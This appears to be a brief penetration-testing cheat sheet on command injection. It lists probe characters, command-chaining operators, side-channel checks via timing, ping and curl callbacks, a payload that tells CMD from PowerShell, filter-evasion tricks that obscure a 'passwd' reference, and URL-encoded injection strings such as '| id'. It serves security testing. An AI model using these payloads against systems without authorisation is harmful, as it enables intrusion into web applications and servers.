See also the encod­ing post for encod­ing methods.

• Try to deter­mine which char­ac­ters are allowed by adding them one by one.

  "
  '
  ;
  &
  |
  >
  `
  \
  (
  )
  #
  {
  }
  [
  ]

• Try the fol­low­ing to add mul­ti­ple com­mands to one bash com­mand.

  |
  &
  >
  ;

• Espe­cial­ly for XSS, try these:
  '
"
{
}
;
<
>

Tips

• Try to redi­rect STDERR to see what goes wrong.
• If only one com­mand is pos­si­ble, try to add && or || … to add anoth­er command.
• If unsure if injec­tion works and no out­put is there, try side chan­nels:
  • Tim­ing: Try some­thing like wait and see if the response is delayed accordingly.
  • ICMP: Try ping your­self and cap­ture ICMP pack­ets with tcpdump.
  • Curl/wget: Open a lis­ten­er and try to request some­thing from yourself.
• If you can inject on win­dows and want to know, weath­er the CMD or PS is used, try to inject this:
  (dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
  Or, in URLen­code:
  (dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell

Bypassing filters

• Use uninialial­ized vari­ables. Langes like PHP return emp­ty string in string con­texts.

  pa$isswd

• Add emp­ty strings

  pa""sswd

• Add com­ments (for the right lan­guage!) like

  pa/**/sswd

• Ressources
  • https://www.exploit-db.com/papers/17934
  •  

Linux / PHP

All URL encod­ed val­ues start­ing with a space character.

| id
%20%7c%20%69%64

|| id
%20%7c%7c%20%69%64

& id
%20%26%20%69%64

&& id
%20%26%26%20%69%64

<?php print "1"" ?>
%20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e

;id
%20%3b%69%64

Sources

• https://github.com/xsscx/Commodity-Injection-Signatures